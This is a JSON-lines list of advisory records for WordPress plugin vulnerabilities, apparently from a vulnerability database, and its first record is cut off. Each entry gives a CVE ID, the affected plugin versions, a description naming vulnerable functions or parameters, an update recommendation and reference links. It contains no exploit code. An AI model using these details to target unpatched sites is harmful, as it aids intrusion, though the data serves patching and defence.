version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13b5292f-4484-498b-b6b7-2895871ab794?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13b5292f-4484-498b-b6b7-2895871ab794?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/two-factor-login-telegram\\\/tags\\\/3.0\\\/includes\\\/class-wp-factor-telegram-plugin.php#L244\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/two-factor-login-telegram\\\/tags\\\/3.0\\\/includes\\\/class-wp-factor-telegram-plugin.php#L244\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0279","slug":"media-library-assistant","versionEndExcluding":"3.06","description":"The Media Library Assistant WordPress plugin before 3.06 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/42db1ba5-1b14-41bd-a2b3-7243a84c9d3d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/42db1ba5-1b14-41bd-a2b3-7243a84c9d3d\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/media-library-assistant_3-05_1\",\"name\":\"https:\\\/\\\/bulletin.iese.de\\\/post\\\/media-library-assistant_3-05_1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1128","slug":"everest-forms","versionImpact":"3.0.9.4","versionEndExcluding":"3.0.9.5","description":"The Everest Forms \u2013 Contact Forms, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin for WordPress is vulnerable to arbitrary file upload, read, and deletion due to missing file type and path validation in the 'format' method of the EVF_Form_Fields_Upload class in all versions up to, and including, 3.0.9.4. This makes it possible for unauthenticated attackers to upload, read, and delete arbitrary files on the affected site's server which may make remote code execution, sensitive information disclosure, or a site takeover possible.","recommendation":"Update to version 3.0.9.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wpeverest\\\/everest-forms\\\/commit\\\/7d37858d2c614aa107b0f495fe50819a3867e7f5\",\"name\":\"https:\\\/\\\/github.com\\\/wpeverest\\\/everest-forms\\\/commit\\\/7d37858d2c614aa107b0f495fe50819a3867e7f5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wpeverest\\\/everest-forms\\\/pull\\\/1406\\\/files\",\"name\":\"https:\\\/\\\/github.com\\\/wpeverest\\\/everest-forms\\\/pull\\\/1406\\\/files\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237831\\\/everest-forms\\\/trunk\\\/includes\\\/abstracts\\\/class-evf-form-fields-upload.php#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237831\\\/everest-forms\\\/trunk\\\/includes\\\/abstracts\\\/class-evf-form-fields-upload.php#file0\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243663\\\/everest-forms#file7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243663\\\/everest-forms#file7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c04d8c9-acad-4832-aa8a-8372c58a0387?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c04d8c9-acad-4832-aa8a-8372c58a0387?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12621","slug":"yumpu-epaper-publishing","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The Yumpu E-Paper publishing plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'YUMPU' shortcode in all versions up to, and including, 3.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yumpu-epaper-publishing\\\/tags\\\/3.0.8\\\/lib\\\/Shortcode.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yumpu-epaper-publishing\\\/tags\\\/3.0.8\\\/lib\\\/Shortcode.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yumpu-epaper-publishing\\\/tags\\\/3.0.8\\\/lib\\\/Shortcode.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yumpu-epaper-publishing\\\/tags\\\/3.0.8\\\/lib\\\/Shortcode.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60c0db19-deda-4b95-a341-cf33883dc9b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/60c0db19-deda-4b95-a341-cf33883dc9b4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8123","slug":"wpextended","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.0.8 via the duplicate_post function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to duplicate posts written by other authors including admins. This includes the ability to duplicate password-protected posts, which reveals their contents.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1e421fb-4839-4e2d-911f-e2fa8c756744?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1e421fb-4839-4e2d-911f-e2fa8c756744?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_duplicator\\\/wpext_duplicator.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_duplicator\\\/wpext_duplicator.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8121","slug":"wpextended","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to unauthorized modification of user names due to a missing capability check on the wpext_change_admin_name() function in all versions up to, and including, 3.0.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change an admin's username to a username of their liking as long as the default 'admin' was used.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3d08ac9-22f7-45f4-9896-05b90f5fce64?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3d08ac9-22f7-45f4-9896-05b90f5fce64?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_block_user_name_admin\\\/wpext_block_user_name_admin.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_block_user_name_admin\\\/wpext_block_user_name_admin.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8119","slug":"wpextended","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the page parameter in all versions up to, and including, 3.0.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50798706-ad0d-431e-ac5f-57a0606c6f94?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/50798706-ad0d-431e-ac5f-57a0606c6f94?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_snippets\\\/wp-extend-module-listing.php#L216\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_snippets\\\/wp-extend-module-listing.php#L216\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8117","slug":"wpextended","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018selected_option\u2019 parameter in all versions up to, and including, 3.0.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f7f91f6-9fe6-4bbf-ba3c-380ba2e97dcd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f7f91f6-9fe6-4bbf-ba3c-380ba2e97dcd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_snippets\\\/wpext_snippets.php#L293\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_snippets\\\/wpext_snippets.php#L293\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8106","slug":"wpextended","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0.8 via the download_user_ajax function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive data including usernames, hashed passwords, and emails.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/593eb5bc-59f9-4944-b147-4ba66d49abe6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/593eb5bc-59f9-4944-b147-4ba66d49abe6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_export_users\\\/wpext_export_users.php#L54\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/modules\\\/core_extensions\\\/wpext_export_users\\\/wpext_export_users.php#L54\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8104","slug":"wpextended","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.0.8 via the download_file_ajax function. This makes it possible for authenticated attackers, with subscriber access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fad1834-0ee1-4542-a5a7-55a32861c81d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fad1834-0ee1-4542-a5a7-55a32861c81d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/libraries\\\/wpext_export\\\/wpext_export.php#L137\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/includes\\\/libraries\\\/wpext_export\\\/wpext_export.php#L137\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8102","slug":"wpextended","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The The Ultimate WordPress Toolkit \u2013 WP Extended plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the module_all_toggle_ajax() function in all versions up to, and including, 3.0.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d47df99-cff5-4be7-ab8e-ef333cf3755b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d47df99-cff5-4be7-ab8e-ef333cf3755b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/admin\\\/class-wp-extended-admin.php#L262\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpextended\\\/trunk\\\/admin\\\/class-wp-extended-admin.php#L262\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3145430%40wpextended%2Ftrunk&old=3134345%40wpextended%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9831","slug":"taskbuilder","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The Taskbuilder  WordPress plugin before 3.0.9 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/390baaf8-a162-43e5-9367-0d2e979d89f7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/390baaf8-a162-43e5-9367-0d2e979d89f7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-47386","slug":"wpextended","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Extended The Ultimate WordPress Toolkit \u2013 WP Extended allows Reflected XSS.This issue affects The Ultimate WordPress Toolkit \u2013 WP Extended: from n\/a through 3.0.8.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpextended\\\/wordpress-wp-extended-plugin-3-0-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wpextended\\\/wordpress-wp-extended-plugin-3-0-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12025","slug":"collapsing-categories","versionImpact":"3.0.8","versionEndExcluding":"3.0.9","description":"The Collapsing Categories plugin for WordPress is vulnerable to SQL Injection via the 'taxonomy' parameter of the \/wp-json\/collapsing-categories\/v1\/get REST API in all versions up to, and including, 3.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201979%40collapsing-categories&new=3201979%40collapsing-categories&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201979%40collapsing-categories&new=3201979%40collapsing-categories&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05153b11-2f26-425e-99ab-93216861802b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05153b11-2f26-425e-99ab-93216861802b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13125","slug":"everest-forms","versionImpact":"3.0.8","versionEndExcluding":"3.0.8.1","description":"The Everest Forms  WordPress plugin before 3.0.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.0.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f60a8358-1765-4cae-9c89-0d75c5e394ec\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f60a8358-1765-4cae-9c89-0d75c5e394ec\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13940","slug":"ninja-forms-webhooks","versionImpact":"3.0.7","versionEndExcluding":"3.0.8","description":"The Ninja Forms Webhooks plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.0.7 via the form webhook functionality. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 3.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/ninjaforms.com\\\/extensions\\\/webhooks\\\/\",\"name\":\"https:\\\/\\\/ninjaforms.com\\\/extensions\\\/webhooks\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cf2af62-2b5a-4c0a-9e82-f80dde204a9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cf2af62-2b5a-4c0a-9e82-f80dde204a9d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0441","slug":"simply-gallery-block","versionEndExcluding":"3.0.8","description":"The Gallery Blocks with Lightbox WordPress plugin before 3.0.8 has an AJAX endpoint that can be accessed by any authenticated users, such as subscriber. The callback function allows numerous actions, the most serious one being reading and updating the WordPress options which could be used to enable registration with a default administrator user role.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/11703e49-c042-4eb6-9a5f-6e006e3725a0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/11703e49-c042-4eb6-9a5f-6e006e3725a0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9501","slug":"wp-social","versionImpact":"3.0.7","versionEndExcluding":"3.0.8","description":"The Wp Social Login and Register Social Counter plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 3.0.7. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.","recommendation":"Update to version 3.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4294f5f-d989-4b97-88ee-4e94f4f7845a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4294f5f-d989-4b97-88ee-4e94f4f7845a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-social\\\/tags\\\/3.0.6\\\/inc\\\/admin-create-user.php#L205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-social\\\/tags\\\/3.0.6\\\/inc\\\/admin-create-user.php#L205\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173675\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173675\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11219","slug":"otter-blocks","versionImpact":"3.0.6","versionEndExcluding":"3.0.7","description":"The Otter Blocks \u2013 Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 3.0.6 via the get_image function. This makes it possible for unauthenticated attackers to view arbitrary images on the server, which can contain sensitive information.","recommendation":"Update to version 3.0.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/otter-blocks\\\/tags\\\/3.0.6\\\/inc\\\/plugins\\\/class-dynamic-content.php#L222\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/otter-blocks\\\/tags\\\/3.0.6\\\/inc\\\/plugins\\\/class-dynamic-content.php#L222\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5e9ab63-d61e-40f1-a5cb-432f33dfd2a6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5e9ab63-d61e-40f1-a5cb-432f33dfd2a6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-35090","slug":"masterstudy-lms-learning-management-system","versionEndExcluding":"3.0.7","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in StylemixThemes MasterStudy LMS WordPress Plugin \u2013 for Online Courses and Education plugin <=\u00a03.0.7 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/masterstudy-lms-learning-management-system\\\/wordpress-masterstudy-lms-plugin-3-0-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/masterstudy-lms-learning-management-system\\\/wordpress-masterstudy-lms-plugin-3-0-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3745","slug":"wp-lightbox-2","versionImpact":"3.0.6.7","versionEndExcluding":"3.0.6.8","description":"The WP Lightbox 2 WordPress plugin before 3.0.6.8 does not correctly sanitize the value of the title attribute of links before using them, which may allow malicious users to conduct XSS attacks.","recommendation":"Update to version 3.0.6.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b50f686-c2e0-4963-95c8-b27137dcc059\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1b50f686-c2e0-4963-95c8-b27137dcc059\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6263","slug":"wp-lightbox-2","versionImpact":"3.0.6.6","versionEndExcluding":"3.0.6.7","description":"The WP Lightbox 2 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018title\u2019 parameter in all versions up to, and including, 3.0.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.0.6.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe275351-a547-440d-9e8c-c464ed333aa9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe275351-a547-440d-9e8c-c464ed333aa9?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-lightbox-2\\\/trunk\\\/wp-lightbox-2.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-lightbox-2\\\/trunk\\\/wp-lightbox-2.js\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?new=3108386%40wp-lightbox-2&old=3046989%40wp-lightbox-2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?new=3108386%40wp-lightbox-2&old=3046989%40wp-lightbox-2\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
